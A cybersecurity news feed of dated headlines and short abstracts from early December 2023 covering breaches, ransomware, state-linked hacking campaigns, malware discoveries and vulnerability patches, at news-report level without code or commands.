New records obtained through a public records request reveal that over 22,000 people were affected by a data breach at the Sweetwater Union High School District in California.

Cyware

December 08, 2023 – Attack

N. Korean Kimsuky Targeting South Korean Research Institutes with Backdoor Attacks Full Text

Abstract

The North Korean threat actor known as Kimsuky has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems. "The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week. The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document. The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor. The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server. It's also capable of

The Hacker News

December 8, 2023 – Breach

Shoe Retailer Aldo Says LockBit Posting Is Related to System at Franchise Partner Full Text

Abstract

The affected data was limited to information related to the franchise partner's operations in a specific overseas territory and did not include any financial or payment card information.

Cyware

December 08, 2023 – Ransomware

Ransomware-as-a-Service: The Growing Threat You Can’t Ignore Full Text

Abstract

Ransomware attacks have become a significant and pervasive threat in the ever-evolving realm of cybersecurity. Among the various iterations of ransomware, one trend that has gained prominence is Ransomware-as-a-Service (RaaS). This alarming development has transformed the cybercrime landscape, enabling individuals with limited technical expertise to carry out devastating attacks. Traditional and double extortion ransomware attacks Traditionally, ransomware refers to a type of malware that encrypts the victim's files, effectively blocking access to data and applications until a ransom is paid to the attacker. However, more contemporary attackers often employ an additional strategy. The bad actors create copies of the compromised data and leverage the threat of publishing sensitive information online unless their demands for ransom are met. This dual approach adds an extra layer of complexity and potential harm to the victims. A new model for ransomware RaaS is the latest busin

The Hacker News

December 8, 2023 – General

Ransomware, Vendor Hacks Push Breach Number to Record High Full Text

Abstract

Data breaches in the U.S. have reached an all-time high, with 2.6 billion personal records compromised in the past two years, driven by aggressive ransomware attacks and breaches targeting third-party vendors.

Cyware

December 08, 2023 – Malware

Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software Full Text

Abstract

Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware. "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said . The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools. The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign. Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered

The Hacker News

December 8, 2023 – Vulnerabilities

Novel ‘DDSpoof’ Attacks Abuse Microsoft DHCP Servers to Spoof DNS Records Full Text

Abstract

The default configuration of Microsoft Dynamic Host Configuration Protocol (DHCP) servers leaves a significant number of organizations vulnerable to these attacks, making them accessible to a wide range of attackers.

Cyware

December 08, 2023 – Vulnerabilities

WordPress Releases Update 6.4.2 to Address Critical Remote Attack Vulnerability Full Text

Abstract

WordPress has released version 6.4.2 with a patch for a critical security flaw that could be exploited by threat actors by combining it with another bug to execute arbitrary PHP code on vulnerable sites. "A remote code execution vulnerability that is not directly exploitable in core; however, the security team feels that there is a potential for high severity when combined with some plugins, especially in multisite installations," WordPress said . According to WordPress security company Wordfence, the issue is rooted in the WP_HTML_Token class that was introduced in version 6.4 to improve HTML parsing in the block editor. A threat actor with the ability to exploit a PHP object injection vulnerability present in any other plugin or theme to chain the two issues to execute arbitrary code and seize control of the targeted site. "If a POP [property-oriented programming] chain is present via an additional plugin or theme installed on the target system, it could all

The Hacker News

December 8, 2023 – Business

ProvenRun Raises $16.2M in Series A Funding Full Text

Abstract

The round was led by Tikehau Capital, through its new vintage of Brienne, its flagship private equity cybersecurity strategy with the French Ministry of Defence’s Definvest fund, managed by Bpifrance.

Cyware

December 08, 2023 – Policy and Law

Founder of Bitzlato Cryptocurrency Exchange Pleads Guilty in Money-Laundering Scheme Full Text

Abstract

The Russian founder of the now-defunct Bitzlato cryptocurrency exchange has pleaded guilty, nearly 11 months after he was arrested in Miami earlier this year. Anatoly Legkodymov (aka Anatolii Legkodymov, Gandalf, and Tolik), according to the U.S. Justice Department, admitted to operating an unlicensed money-transmitting business that enabled other criminal actors to launder their illicit proceeds. He faces up to five years in prison. "Legkodymov operated a cryptocurrency exchange that was open for business to money launderers and other criminals," said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department's Criminal Division. "He profited from catering to criminals, and now he must pay the price. Transacting in cryptocurrency does not put you beyond the reach of the law." Bitzlato, which served as a safe haven for fraudsters and ransomware crews such as Conti , is estimated to have received $2.5 billion in cryptocurrency bet

The Hacker News

December 8, 2023 – Malware

New Variants of HeadCrab Malware Commandeer Thousands of Servers Full Text

Abstract

The HeadCrab malware has resurfaced with a new variant that allows root access to Redis servers, infecting over 1,100 servers and enabling the attacker to control and modify responses.

Cyware

December 7, 2023 – Vulnerabilities

Google Pushes Yet Another Security Update to Its Chrome Browser Full Text

Abstract

Chrome version 120 includes 10 bug fixes, with two of them being highly critical security patches. The high-ranked security vulnerabilities include "Use after free" exploits in Media Stream and Side Panel Search.

Cyware

December 07, 2023 – Hacker

Microsoft Warns of COLDRIVER’s Evolving Evading and Credential-Stealing Tactics Full Text

Abstract

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities. The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446. The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said . Star Blizzard , linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017. In August 2023, Recorded Future

The Hacker News

December 7, 2023 – Vulnerabilities

Dangerous Vulnerability in Fleet Management Software Seemingly Ignored by Vendor Full Text

Abstract

The vulnerability, which impacts the Syrus4 IoT gateway made by Digital Communications Technologies (DCT), gives hackers access to the software and commands used to manage thousands of vehicles.

Cyware

December 07, 2023 – Vulnerabilities

New Bluetooth Flaw Let Hackers Take Over Android, Linux, macOS, and iOS Devices Full Text

Abstract

A critical Bluetooth security flaw could be exploited by threat actors to take control of Android, Linux, macOS and iOS devices. Tracked as CVE-2023-45866 , the issue relates to a case of authentication bypass that enables attackers to connect to susceptible devices and inject keystrokes to achieve code execution as the victim. "Multiple Bluetooth stacks have authentication bypass vulnerabilities that permit an attacker to connect to a discoverable host without user confirmation and inject keystrokes," said security researcher Marc Newlin , who disclosed the flaws to the software vendors in August 2023. Specifically, the attack deceives the target device into thinking that it's connected to a Bluetooth keyboard by taking advantage of an "unauthenticated pairing mechanism" that's defined in the Bluetooth specification. Successful exploitation of the flaw could permit an adversary in close physical proximity to connect to a vulnerable device and trans

The Hacker News

December 7, 2023 – Breach

Groveport Madison School District Servers Hacked by Ransomware Group Full Text

Abstract

The BlackSuit ransomware group was able to hack into two servers belonging to the school district, impacting Windows devices, file services, printers, and copiers. Phones were not impacted.

Cyware

December 07, 2023 – Education

Hacking the Human Mind: Exploiting Vulnerabilities in the ‘First Line of Cyber Defense’ Full Text

Abstract

Humans are complex beings with consciousness, emotions, and the capacity to act based on thoughts. In the ever-evolving realm of cybersecurity, humans consistently remain primary targets for attackers. Over the years, these attackers have developed their expertise in exploiting various human qualities, sharpening their skills to manipulate biases and emotional triggers with the objective of influencing human behaviour to compromise security whether it be personal and organisational security. More than just a 'human factor' Understanding what defines our humanity, recognizing how our qualities can be perceived as vulnerabilities, and comprehending how our minds can be targeted provide the foundation for identifying and responding when we inevitably become the target. The human mind is a complex landscape that evolved over years of exposure to the natural environment, interactions with others, and lessons drawn from past experiences. As humans, our minds set us apart, marke

The Hacker News

December 7, 2023 – Breach

Millions of Patient Scans and Health Records Spilling Online Thanks to Decades-Old DICOM Bug Full Text

Abstract

Over 3,800 PACS servers across 110 countries are unintentionally exposing the private data of 16 million patients, including names, addresses, and even Social Security numbers.

Cyware

December 07, 2023 – Education

Building a Robust Threat Intelligence with Wazuh Full Text

Abstract

Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the constantly evolving threat landscape. Importance of threat intelligence in the cybersecurity ecosystem Threat intelligence is a crucial part of any cybersecurity ecosystem. A robust cyber threat intelligence program helps organizations identify, analyze, and prevent security breaches. Threat intelligence is important to modern cyber security practice for several reasons: Proactive defense: Organizations can enhance their overall cyber resilience by integrating threat intelligence into security practices to address the specific threats and risks that are relevant to their industry, geolocation, or technology stack. Threat intelligence allows organizations to identify potential threats in advanc

The Hacker News

December 7, 2023 – Vulnerabilities

Apple and Some Linux Distros are Open to Bluetooth Attack Full Text

Abstract

A Bluetooth authentication bypass vulnerability, tracked as CVE-2023-45866, allows attackers to connect to Apple, Android, and Linux devices and inject keystrokes to run arbitrary commands.

Cyware

December 07, 2023 – Privacy

Governments May Spy on You by Requesting Push Notifications from Apple and Google Full Text

Abstract

Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden. "Push notifications are alerts sent by phone apps to users' smartphones," Wyden said . "These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments." Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments. When mobile apps for Android and iOS send push notifications to users' devices, they are ro

The Hacker News

December 7, 2023 – APT

TA422’s Dedicated Exploitation Loop—the Same Week After Week Full Text

Abstract

Russian APT group TA422 has been actively exploiting patched vulnerabilities to target government, aerospace, education, finance, manufacturing, and technology sectors in Europe and North America.

Cyware

December 07, 2023 – Malware

New Stealthy ‘Krasue’ Linux Trojan Targeting Telecom Firms in Thailand Full Text

Abstract

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021. Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News. The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty. This has raised the possibility that Krasue is eithe

The Hacker News

December 7, 2023 – Attack

Schools in Maine, Indiana and Georgia Contend Ransomware Attacks Full Text

Abstract

The Henry County Schools district in Georgia and the Hermon School Department in Maine are among the latest victims, with the former experiencing a ransomware attack and the latter having outdated software vulnerabilities exploited.

Cyware

December 6, 2023 – Criminals

North Korean Andariel Hackers Steal South Korean Anti-Aircraft Data Full Text

Abstract

Seoul police have seized the servers and virtual asset exchanges used by Andariel, arrested the person involved in transferring ransomware funds, and advised organizations to strengthen their cybersecurity measures to prevent future attacks.

Cyware

December 06, 2023 – Vulnerabilities

Alert: Threat Actors Can Leverage AWS STS to Infiltrate Cloud Accounts Full Text

Abstract

Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks. The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth said in a Tuesday analysis. AWS STS is a web service that enables users to request temporary, limited-privilege credentials for users to access AWS resources without needing to create an AWS identity. These STS tokens can be valid anywhere from 15 minutes to 36 hours . Threat actors can steal long-term IAM tokens through a variety of methods like malware infections, publicly exposed credentials, and phishing emails, subsequently using them to determine roles and privileges associated with those tokens via API calls. "Depending on the token's permission level, adversaries may also be able to use it to create additional IAM users with long-term AKIA tokens to e

The Hacker News

December 6, 2023 – Business

Mine Digs up $30M for Its No-Code Approach to Vetting Data Privacy Full Text

Abstract

Battery Ventures and PayPal Ventures are co-leading this round, with participation also from Nationwide Ventures and all its previous backers, including Saban Ventures, Gradient Ventures, MassMutual Ventures, and Headline Ventures.

Cyware

December 06, 2023 – General

New Report: Unveiling the Threat of Malicious Browser Extensions Full Text

Abstract

Compromising the browser is a high-return target for adversaries. Browser extensions, which are small software modules that are added to the browser and can enhance browsing experiences, have become a popular browser attack vector. This is because they are widely adopted among users and can easily turn malicious through developer actions or attacks on legitimate extensions. Recent incidents like DataSpii and the Nigelthorn malware attack have exposed the extent of damage that malicious extensions can inflict. In both cases, users innocently installed extensions that compromised their privacy and security. The underlying issue lies in the permissions granted to extensions. These permissions, often excessive and lacking granularity, allow attackers to exploit them. What can organizations do to protect themselves from the risks of browser extensions without barring them from use altogether (an act that would be nearly impossible to enforce)? A new report by LayerX, "Unveiling the

The Hacker News

December 6, 2023 – Vulnerabilities

Post-Exploitation Tampering Technique can be Used to Simulate Fake Lockdown Mode on iPhones Full Text

Abstract

Hackers can manipulate Lockdown Mode to provide visual cues of activation without actually implementing any protections. Lockdown Mode should not be relied upon as a comprehensive security measure and users should be aware of its limitations.

Cyware

December 06, 2023 – Vulnerabilities

Sierra:21 - Flaws in Sierra Wireless Routers Expose Critical Sectors to Cyber Attacks Full Text

Abstract

A collection of 21 security flaws have been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS . Collectively tracked as Sierra:21 , the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according to Forescout Vedere Labs. A majority of these devices are located in the U.S., Canada, Australia, France, and Thailand. "These vulnerabilities may allow attackers to steal credentials, take control of a router by injecting malicious code, persist on the device and use it as an initial access point into critical networks," the industrial cybersecurity company said in a new analysis. Of the 21 vulnerabilities, one is rated critical, nine are rated high, and 11 are rated medium in severity. This includes remote code execution (RCE), cross-site scripting (XSS), denial-of-service (DoS), unauthori

The Hacker News

December 6, 2023 – Malware

SpyLoan Android Malware Targets Users in Southeast Asia, Africa, and Latin America Full Text

Abstract

These apps trick users into providing sensitive personal and financial information, which is then used to blackmail them. The apps focus on users in Southeast Asia, Africa, and Latin America.

Cyware

December 06, 2023 – Education

Scaling Security Operations with Automation Full Text

Abstract

In an increasingly complex and fast-paced digital landscape, organizations strive to protect themselves from various security threats. However, limited resources often hinder security teams when combatting these threats, making it difficult to keep up with the growing number of security incidents and alerts. Implementing automation throughout security operations helps security teams alleviate these challenges by streamlining repetitive tasks, reducing the risk of human error, and allowing them to focus on higher-value initiatives. While automation offers significant benefits, there is no foolproof method or process to guarantee success. Clear definitions, consistent implementation, and standardized processes are crucial for optimal results. Without guidelines, manual and time-consuming methods can undermine the effectiveness of automation. This blog explores the challenges faced by security operations teams when implementing automation and the practical steps needed to build a stro

The Hacker News

December 06, 2023 – Government

Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers Full Text

Abstract

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers. "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA said , adding an unnamed federal agency was targeted between June and July 2023. The shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, released on March 14, 2023, respectively. It was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being "exploited in the wild in very limited attacks."

The Hacker News

December 06, 2023 – Vulnerabilities

Atlassian Releases Critical Software Fixes to Prevent Remote Code Execution Full Text

Abstract

Atlassian has released software fixes to address four critical flaws in its software that, if successfully exploited, could result in remote code execution. The list of vulnerabilities is below - CVE-2022-1471 (CVSS score: 9.8) - Deserialization vulnerability in SnakeYAML library that can lead to remote code execution in multiple products CVE-2023-22522 (CVSS score: 9.0) - Remote code execution vulnerability in Confluence Data Center and Confluence Server (affects all versions including and after 4.0.0) CVE-2023-22523 (CVSS score: 9.8) - Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server) CVE-2023-22524 (CVSS score: 9.6) - Remote code execution vulnerability in Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0) Atlassian described CVE-2023-22522 as a template injection flaw that allo

The Hacker News

December 5, 2023 – Attack

Florida Water Agency Latest to Confirm Cyber Incident as Feds Warn of Nation-State Attacks Full Text

Abstract

The St. Johns River Water Management District in Florida has confirmed that it responded to a cyberattack last week, amid warnings from top cybersecurity agencies about foreign attacks on water utilities.

Cyware

December 05, 2023 – Vulnerabilities

Warning for iPhone Users: Experts Warn of Sneaky Fake Lockdown Mode Attack Full Text

Abstract

A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks. The novel method, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause Lockdown Mode to be 'bypassed' when you trigger its activation." In other words, the goal is to implement Fake Lockdown Mode on a device that's compromised by an attacker through other means, such as unpatched security flaws that can trigger execution of arbitrary code. Lockdown Mode , introduced by Apple last year with iOS 16, is an enhanced security measure that aims to safeguard high-risk individuals from sophisticated digital threats such as mercenary spyware by minimizing the attack surface . What it doesn't do is prevent the execution of mali

The Hacker News

December 5, 2023 – Breach

Iran-Linked Hackers Claim to Leak Troves of Documents From Israeli Hospital Full Text

Abstract

A hacker group allegedly linked to Iran, known as Malek Team, has claimed responsibility for a cyberattack on an Israeli hospital, resulting in the leak of thousands of medical records, including those of Israeli soldiers.

Cyware

December 05, 2023 – Disinformation

Russia’s AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany Full Text

Abstract

The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts. These campaigns are designed to amplify content designed to undermine Ukraine as well as propagate anti-LGBTQ+ sentiment, U.S. military competence, and Germany's economic and social issues, according to a new report shared with The Hacker News. Doppelganger , described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency. Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives. The late

The Hacker News

December 5, 2023 – Breach

International Dog Breeding Organization WALA Exposes 25GB of Pet Owners’ Data Full Text

Abstract

The breach exposes the global customer base of WALA to potential threats like phishing attacks and financial scams, emphasizing the need for affected parties to monitor their financial accounts and implement additional security measures.

Cyware

December 05, 2023 – Education

Generative AI Security: Preventing Microsoft Copilot Data Exposure Full Text

Abstract

Microsoft Copilot has been called one of the most powerful productivity tools on the planet. Copilot is an AI assistant that lives inside each of your Microsoft 365 apps — Word, Excel, PowerPoint, Teams, Outlook, and so on. Microsoft's dream is to take the drudgery out of daily work and let humans focus on being creative problem-solvers. What makes Copilot a different beast than ChatGPT and other AI tools is that it has access to everything you've ever worked on in 365. Copilot can instantly search and compile data from across your documents, presentations, email, calendar, notes, and contacts. And therein lies the problem for information security teams. Copilot can access all the sensitive data that a user can access, which is often far too much. On average, 10% of a company's M365 data is open to all employees. Copilot can also rapidly generate net new sensitive data that must be protected. Prior to the AI revolution, humans' ability to create and share data

The Hacker News

December 5, 2023 – Government

OPM Launches Cyber Rotational Program for Feds Full Text

Abstract

The OPM has launched a new Federal Rotational Cyber Workforce Program, allowing cybersecurity employees in the federal government to apply for rotational opportunities at other agencies to enhance their skills and defend against evolving threats.

Cyware

December 05, 2023 – Vulnerabilities

15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack Full Text

Abstract

New research has found that over 15,000 Go module repositories on GitHub are vulnerable to an attack called repojacking. "More than 9,000 repositories are vulnerable to repojacking due to GitHub username changes," Jacob Baines, chief technology officer at VulnCheck, said in a report shared with The Hacker News. "More than 6,000 repositories were vulnerable to repojacking due to account deletion." Collectively, these repositories account for no less than 800,000 Go module-versions. Repojacking , a portmanteau of "repository" and "hijacking," is an attack technique that allows a bad actor to take advantage of account username changes and deletions to create a repository with the same name and the pre-existing username to stage open-source software supply chain attacks. Earlier this June, cloud security firm Aqua revealed that millions of software repositories on GitHub are likely vulnerable to the threat, urging organizations that undergo

The Hacker News

December 5, 2023 – Attack

Accounting Software Giant Tipalti Investigating Ransomware Attack Full Text

Abstract

ALHV, a prolific ransomware group, allegedly gained persistent access to multiple Tipalti systems and stole over 265GB of data, with claims of insider involvement in the attacks.

Cyware

December 05, 2023 – Attack

New Threat Actor ‘AeroBlade’ Emerges in Espionage Attack on U.S. Aerospace Full Text

Abstract

A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission. The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as AeroBlade . Its origin is currently unknown and it's not clear if the attack was successful. "The actor used spear-phishing as a delivery mechanism: A weaponized document, sent as an email attachment, contains an embedded remote template injection technique and a malicious VBA macro code, to deliver the next stage to the final payload execution," the company said in an analysis published last week. The network infrastructure used for the attack is said to have gone live around September 2022, with the offensive phase of the intrusion occurring nearly a year later in July 2023, but not before the adversary took steps to improvise its toolset to make it more stealthy in the intervening time perio

The Hacker News

December 5, 2023 – Phishing

Hershey phishes! Crooks snarf chocolate lovers’ creds Full Text

Abstract

The phishing emails were sent to employees in early September and allowed the criminals to steal a range of personal data, including names, health and medical information, credit card numbers, and online account credentials.

Cyware

December 05, 2023 – APT

Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability Full Text

Abstract

Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a now-patched critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. The goal, according to the Polish Cyber Command (DKWOC), is to obtain unauthorized access to mailboxes belonging to public and private entities in the country. "In the next stage of malici

The Hacker News

December 4, 2023 – Policy and Law

Establishing New Rules for Cyber Warfare Full Text

Abstract

The International Committee of the Red Cross (ICRC) has released a set of rules for civilian hackers involved in cyber conflicts. The rules aim to clarify the line between civilians and combatants in cyberspace during times of war.

Cyware

December 04, 2023 – Vulnerabilities

New BLUFFS Bluetooth Attack Expose Devices to Adversary-in-the-Middle Attacks Full Text

Abstract

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers. The issues, collectively named BLUFFS , impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022. The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month. This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions. While forward secrecy in key-agreement cryptographic protocols ensures that past communications are not revealed, even if the private keys to a particular exchange are re

The Hacker News

December 4, 2023 – Attack

BlackCat Ransomware Strikes Ho Chi Minh City Power Corporation Full Text

Abstract

The ongoing attack spree by the BlackCat ransomware group extends beyond Vietnam Electricity, with social media platforms like Roblox and Twitch potentially being targeted next.

Cyware

December 04, 2023 – General

Make a Fresh Start for 2024: Clean Out Your User Inventory to Reduce SaaS Risk Full Text

Abstract

As work ebbs with the typical end-of-year slowdown, now is a good time to review user roles and privileges and remove anyone who shouldn't have access as well as trim unnecessary permissions. In addition to saving some unnecessary license fees, a clean user inventory significantly enhances the security of your SaaS applications. From reducing risk to protecting against data leakage, here is how you can start the new year with a clean user list. How Offboarded Users Still Have Access to Your Apps When employees leave a company, they trigger a series of changes to backend systems in their wake. First, they are removed from the company's identity provider (IdP), which kicks off an automated workflow that deactivates their email and removes access to all internal systems. When enterprises use an SSO (single sign-on), these former employees lose access to any online properties – including SaaS applications – that require SSO for login. However, that doesn't mean that former employee

The Hacker News

December 4, 2023 – Breach

More Than 1,500 Hugging Face API Tokens Exposed, Major Projects Vulnerable Full Text

Abstract

The exposed API tokens had write permissions, allowing attackers to modify files in account repositories and potentially manipulate existing models, posing a significant threat to organizations and their applications.

Cyware

December 04, 2023 – Botnet

New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices Full Text

Abstract

Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices. The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages ( MIPS ) architecture, broadening its capabilities and reach. "It's highly likely that by targeting MIPS, the P2PInfect developers intend to infect routers and IoT devices with the malware," security researcher Matt Muir said in a report shared with The Hacker News. P2PInfect, a Rust-based malware, was first disclosed back in July 2023, targeting unpatched Redis instances by exploiting a critical Lua sandbox escape vulnerability ( CVE-2022-0543 , CVSS score: 10.0) for initial access. A subsequent analysis from the cloud security firm in September revealed a surge in P2PInfect activity, coinciding with the release of iterative variants of the malware. The new artifacts, besides attempting to condu

The Hacker News

December 4, 2023 – Breach

Depauw University Warns of Data Breach as Ransomware Attacks on Colleges Surge Full Text

Abstract

The attack on DePauw University was conducted by the Black Suit ransomware gang, highlighting the increasing trend of ransomware attacks targeting educational institutions.

Cyware

December 04, 2023 – Vulnerabilities

LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks Full Text

Abstract

The Unified Extensible Firmware Interface ( UEFI ) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware. The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel Boot Guard, and other security technologies by design." Furthermore, they can be weaponized to bypass security solutions and deliver persistent malware to compromised systems during the boot phase by injecting a malicious logo image file into the EFI system partition . While the issues are not silicon-specific, meaning they impact both x86 and ARM-based devices, they are also UEFI and IBV-specific. The vulnerabilities comprise a heap-based buffer overflow flaw and an out-of-bounds read, details of which are expected to be made public later this week at the Black Hat Europe conference .

The Hacker News

December 4, 2023 – Malware

New Variant of P2Pinfect Targets MIPS Devices Including Routers and IoT Devices Full Text

Abstract

The new variant includes updated evasion techniques, such as Virtual Machine detection, debugger detection, and anti-forensics measures on Linux hosts, making it more difficult for researchers to analyze.

Cyware

December 04, 2023 – Phishing

Microsoft Warns of Malvertising Scheme Spreading CACTUS Ransomware Full Text

Abstract

Microsoft has warned of a new wave of CACTUS ransomware attacks that leverage malvertising lures to deploy DanaBot as an initial access vector. The DanaBot infections led to "hands-on-keyboard activity by ransomware operator Storm-0216 (Twisted Spider, UNC2198), culminating in the deployment of CACTUS ransomware," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). DanaBot , tracked by the tech giant as Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a point of entry for next-stage payloads. UNC2198, for its part, has been previously observed infecting endpoints with IcedID to deploy ransomware families such as Maze and Egregor, as detailed by Google-owned Mandiant in February 2021. Per Microsoft, the threat actor has also taken advantage of initial access provided by QakBot infections. The shift to DanaBot, therefore, is likely the resu

The Hacker News

December 4, 2023 – Breach

Astrology Website WeMystic Exposes Over 13 Million User Records Full Text

Abstract

The astrology and spiritual content platform WeMystic exposed the sensitive data of its users, including names, email addresses, and dates of birth, due to an open and passwordless MongoDB database.

Cyware

December 4, 2023 – Education

Bridging the Gap Between Cloud vs On-Premise Security Full Text

Abstract

It is crucial to maintain unified visibility, control, and management across both cloud-based and on-premise security measures to bridge the gap and create a comprehensive and future-proof security stack.

Cyware

December 4, 2023 – Attack

Update: New Relic Admits Attack on Staging Systems, User Accounts Full Text

Abstract

Web tracking and analytics company New Relic has disclosed a cyberattack on its staging systems, which were compromised in mid-November by an unauthorized actor using stolen credentials and social engineering.

Cyware

December 2, 2023 – Outage

60 US Credit Unions Offline After Cloud Ransomware Infection Full Text

Abstract

The affected IT provider, Ongoing Operations, was infiltrated through the Citrix Bleed vulnerability, emphasizing the importance of robust cybersecurity measures and patching vulnerabilities promptly.

Cyware

December 02, 2023 – Attack

Agent Racoon Backdoor Targets Organizations in Middle East, Africa, and U.S. Full Text

Abstract

Organizations in the Middle East, Africa, and the U.S. have been targeted by an unknown threat actor to distribute a new backdoor called Agent Racoon . "This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities," Palo Alto Networks Unit 42 researcher Chema Garcia said in a Friday analysis. Targets of the attacks span various sectors such as education, real estate, retail, non-profits, telecom, and governments. The activity has not been attributed to a known threat actor, although it's assessed to be a nation-state aligned owing to the victimology pattern and the detection and defense evasion techniques used. The cybersecurity firm is tracking the cluster under the moniker CL-STA-0002. It's currently not clear how these organizations were breached, and when the attacks took place. Some of the other tools deployed by the adversary include

The Hacker News

December 2, 2023 – Ransomware

Expert Warns of Turtle macOS Ransomware Full Text

Abstract

